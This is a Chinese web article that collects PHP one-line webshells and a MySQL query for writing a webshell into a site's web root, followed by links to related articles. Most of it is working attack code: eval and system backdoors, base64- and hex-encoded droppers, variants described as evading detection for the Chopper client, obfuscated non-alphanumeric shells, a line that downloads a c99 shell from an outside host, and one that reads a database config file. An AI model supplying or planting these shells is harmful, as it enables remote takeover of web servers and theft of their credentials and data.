PHP与SQL语句写一句话木马总结
在本篇文章里小编给大家整理的是关于PHP与SQL语句写一句话木马的相关知识点,有需要的朋友们学习下。
一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:
<?php @eval($_GET["code"])?>
<?php @system($_POST["cmd"])?>
二、编码的替换的类型:
- <?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?>
- //会生成<?php @eval($_POST['lostwolf']);?>
- <script language="php">@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));</script>
- //php在html内部的一种嵌入方式
- <?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?>
- <?php
- session_start();
- $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
- $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');?>
三、其他类型:
- <?php $_GET[a]($_GET[b]);?>
- //?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
- <?php assert($_REQUEST["pass"]);?> //菜刀连接 躲避检测 密码pass
- <?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['pass']);?>
- //菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 pass
四、下载类型:
<?php echo copy("http://www.phpfensi.com/c99.txt","lostwolf.php"); ?>
<? echo file_get_contents("..//cfg_database.php");?> //显示某文件
<? eval ( file_get_contents("远程shell")) ?> //运行远程shell
五、无关键函数类型:
- <?php
- $_="";
- $_[+""]='';
- $_="$_"."";
- $_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
- ?>
- <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
- http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass
- <?$_="";$_[+""]='_';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>
六、补充知识点:
SQL写一句话(MySQL):
select "<?php @system($_POST["pass"]);?>" into outfile "/home/webaccount/projectname/www/*.php"
#前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以
赞 (4)
浅谈MySQL导出一句话木马拿WebShell的方法
上一篇12-25
6条比较有用的MySQL数据库操作的SQL语句小结
下一篇 4-17
相关推荐
PHP后门的隐藏技巧测试报告
PHP后门的隐藏技巧测试报告最近很多朋友都在问我是否能把我那一句话木马隐藏到HTML或图片里,其实把一句话木马插入到PHP文件中就已经很隐蔽了,如果说硬是要放到HTML文件或图片里,就接着往下看这篇的篇测试报告吧。要知道如果光把PHP语句放…SQL 语句select top 变量问题
SQL语句selecttop变量问题今天我在写一个存储过程的时候,想动态的取若干行出来,开始用拼接字符串也可以,但是总觉得不好,就在网上查资料,找到一种方式,但是怎么也没有成功,后来终于发现是该方法不能在SQL2000中使用,只能在SQL2…phpinfo
phpinfo在PHP开发语言中有一个探针函数phpinfo,只需要写一句简单的PHP代码即可调用这个探针函数来探测服务器的PHP环境。phpinfo()函数的调用方式如下:<?phpinfo();?>就这样一句简单的php语句…mysql order by null 使用说明
今天我在mysql中发现有这么一句select*frombborderbynull看不出这句话的时间呀,后来找了才知道orderbynull用途是强制对查询结果禁用排序.orderbynull用途是强制对查询结果禁用排序,通过explain检查查询语句时候,如果看到Extra列中有Usingfilesort,这是对性能有一定影响的,特别是使用了groupby时,就算你没有显示的指定orderby,…PHP异常处理(Exception)什么情况下使用?
异常处理虽然说使用简单但是我们应该在哪些情况下使用异常处理呢,今天小编就来为各位介绍关于php异常处理的使用方法了,具体的操作细节如下所示.首先看一段官方解释(异常处理),如上,其最后一句话说明解释异常与PHP错误的关联解决上.下面来看异常与PHP错误机制各有什么优缺点?应该如何使用?根据PHP官方说明PHP的错误机制(错误码)出现于异常之前,用于输入PHP的错误信息,从衍生性来看异常这个概念可以…Windows服务器中PHP如何安装redis扩展
一句话总结:下载扩展的dll,放入指定文件夹(php对应的扩展的目录php/ext),在配置文件php.ini中注册dll,这里就为大家分享一下。一、总结一句话总结:下载扩展的dll,放入指定文件夹(php对应的扩展的目录php/ext),在配置文件php.ini中注册dll尽量不要选择最新版php和redis扩展,下载时文件名的每一个字符尽量看懂意思下载dll放入php扩展插件文件夹在配置文件p…php常用字符串查找函数strstr()与strpos()实例分析
这篇文章主要介绍了php常用字符串查找函数strstr()与strpos(),结合具体实例形式分析了php字符串查找函数strstr()与strpos()的具体功能、用法、区别及相关操作注意事项,需要的朋友可以参考下。本文实例讲述了php常用字符串查找函数strstr()与strpos()。分享给大家供大家参考,具体如下:一句话使用strpos判断===或!==,这样才能达到预期的效果,性能要比s…php eval函数一句话木马代码
这个是php常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算。该字符串必须是合法的PHP代码,且必须以分号结尾。如果没有在代码字符串中调用return语句,则返回NULL,如果代码中存在解析错误,则eval()函数返回false。eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要小心,可能是木马就这一句话害死人,…
